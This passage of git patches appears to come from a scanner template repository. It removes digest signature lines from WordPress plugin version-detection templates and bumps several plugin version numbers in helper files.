4a0a00473045022056f0859f26ef432f650db71bd0d05c5a1123742c0af01efa97ff2ab676996dc2022100a4fa4a8171b32277f3edab96cbddb501f7bd74635bf78e7b4a9f8704a2f4817d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index c6467029e2..a773829b7d 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cfdd23a01c59a6047ebae57b6cd1288affa19f2b730389a2820cb5d6babc260902202b1a2c72fee42da8140b094bb90efdc861889532c0c870f4891d74d50021b624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 990d628be7..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008090095de00ce74f20990862c612bdd57033f29d3bca9432ac0b8e8b9f3762fe022100f88768253c5bbecbafa5476118f5af00c74fcb3b2db4f7db02ea8332e33db2b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index e9ed82bafa..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210098132104e9022d1d3c583ea0055b4d2b6a85b2d66eec0f8922f0028688c8c973022073199c1c94314af7b666fb9475c8a813a32e578eea560ba71b93b620719d4904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ddd2e829dc..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6787b14e2018e6dfbcc1ca03d6cbefbb2130caa32de600345ebe15be9742d04022100d6407ecd30a700fb0adab5d3d043b3d7f5a924b8d9bb4a18e49f92edd74c0915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 07204c8f74..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf8a4dc89f71fd4ec985e121834abf27d27516f39a62b6afe0b5d9bbd45f7d1e0221009c88dfbab25851f4e766e9f531de0049679cd2da8350c88a3bb72233a5f5f5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index aad0659f82..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058c12d70842dbbcdf5e862b874325bd42ca167e1b97a0afaa07d5c3b2d04471a02204ba873222560b9a015da2978ed0e4e5bfb9bf8a2bc4622f8e9e7dc4d1ea34b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 5c8575e958..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdf34b5a14d4a5a2137312303d5d74304d883b11a80b5965fa4b79c25953578802203e274e53d19565ae1257751a839d659f8633f15c93af552423019e9aaa9988e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3bfd9c9ef9..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201301351836f84ead9c81eca1e97aae2609109d36359d247be00276c43634f91302210081ffb1b6f02f5a278a51c52acc5fcfa671e1b10d86f4f72fb4582e8edd196773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 28002570a4..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022070509df922287d3e71b9cf9e623b818afd444701ad4e2a13b33692a8cc5512fa022100c59580c1d31e88b853ce6ed9b32c5f26cae8c4ac3909da5e5a284f38a43d90c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 89cf25f23b..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220595290d54136c5390edbf6c504def6f1314242b31e3aaeb022e8d65c769a440d02206a57086a46e87d1996595778d3a15c54daea0a0868afda61c3d2a9b6e557d1b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 86b4a58607..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca2bb4847c6fd22bffe233d23feb37a8abaa2f40bc86d7f9d82b1cefaf6085e4022100f0b96ee3e9ab9daf576d458e8dae869617f6c73f66a61d1348b2f40fe9ed3f3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index eda6c80366..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dab42d19f7f02ad2eb372dce955e9d7c2377cb1cda3c5eb734be85c062638e0a0221009bdd6a38bb1c69e6f88521808049fcc9d4292903269e4b71fe830158e72dee72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 8db0a1eab6..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220341ef29aea057b215e590feb41a16117116b6e2847f126a5646e1ab47cb13efd022100caff0f2f82f4ab64afce14dd6438bbc225525e51b5428232764176ce92e2c5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index c24944c378..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202dd4c7167b6d1e8103ee04feeed68e10f60c88fd5f11522a7d65f8c4591b38d5022100e04f7477ee78d0a6b166239a510ecd1dbd6d403dc57f704d9353482026e20c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index f28d6aeee1..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040755cac2ee8139447db478c592054ecfdc955e07a2054b5cb42dfedddc837ab02201b3ee5e3ec85988670ce59dcd5326c63c3302e198253a3149ee23d8d887c8c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index e49daf97d3..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220516674edad0a69de50308336a14db70187d29cc54720aeb52ddd15a0d9981695022100924c47850dcf618bef9e7382f00a0c2de73d0ca50b35ad01fde4161d37414ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 1937401a47..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbc0e66086eea954483a823cc77f969d7486d9c20b764c5068ba61b884820a2a022100bcac9a6505cf102424066b315633a61d8d76a1d6c65c332892d64632bb6b7a4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index d965316867..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e41859e91409e6e0707178e532c79d01206f57890620cc3391155a2ffa1035fe02202350085b98ebced46bb6815f89ca794c66848a74fcb87cc9935fa9b026dd8313:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index 362d0179a0..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220419c7f217d7cba1c6a6ee7ea8922e7cffba9cc06f66b0290740f6d886b0e5a6002201ceb9d6950698b6c3ad92de0473cbe3c4d991c7f25a2442cf66d60e112486127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 5efd53fe21..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5c68e0c939c94e7ef05c8fae7c49810da2916547e382a73cd9c18e34488d66d0221009f3e2da7de9d154703ce390b2851f87a0a8fb31a00db61ae1a66ef2e91fe27af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1741e17ef6..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b7c945bf017eb55b28cf092aece7451e0ea1a3cd5c2cd288122dd405fbb81caf02204ef766742448db1f76bb8fb5dfd62fd814c73169433053742e39c3a2444572dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ab28167fdc..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bedebb24776cf044ca2b1fc5f6369eb1901c1697a608e26c57edeef595e7d8f7022100ab959ed8b93184d0b55ee7390525a5bf35622d5a088229102a22799be9b18448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 67310807bd..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd2c3182461db33f9e7a7154ab4d197a91e59e4b35077cc69f214952d957e01e0221009e817ab1202b66008386fcfb3f932600660ed487752acf5b068dd2d9545f92ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index dae60f13cc..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210087653452459bf85a74b28101bcd7ee7ac1380c2dadbd6468da1b4982fd2d421502207cf99cd4a078fa7ffaa3a714c2e31684a47b5f5b5503f01146351dc44ff6069e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dda09f5eda1b967acfbb808a02047811e27d934b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 4 Aug 2024 00:22:03 +0000 Subject: [PATCH 1840/1841] Auto WordPress Plugins Update [Sun Aug 4 00:22:03 UTC 2024] :robot: --- helpers/wordpress/plugins/svg-support.txt | 2 +- helpers/wordpress/plugins/woocommerce-gateway-stripe.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/helpers/wordpress/plugins/svg-support.txt b/helpers/wordpress/plugins/svg-support.txt index 1b03fe63dd..6de6d05565 100644 --- a/helpers/wordpress/plugins/svg-support.txt +++ b/helpers/wordpress/plugins/svg-support.txt @@ -1 +1 @@ -2.5.6 \ No newline at end of file +2.5.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt index bd0b85a9b1..1acea15afd 100644 --- a/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt +++ b/helpers/wordpress/plugins/woocommerce-gateway-stripe.txt @@ -1 +1 @@ -8.5.2 \ No newline at end of file +8.6.0 \ No newline at end of file From 9bd624a6fd92fe6a63ad78a43affcbd5bb421a7d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Aug 2024 00:20:55 +0000 Subject: [PATCH 1841/1841] Auto WordPress Plugins Update [Mon Aug 5 00:20:55 UTC 2024] :robot: --- helpers/wordpress/plugins/webp-converter-for-media.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 22f097e28e..47c78569cc 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -5.13.0 \ No newline at end of file +5.13.1 \ No newline at end of file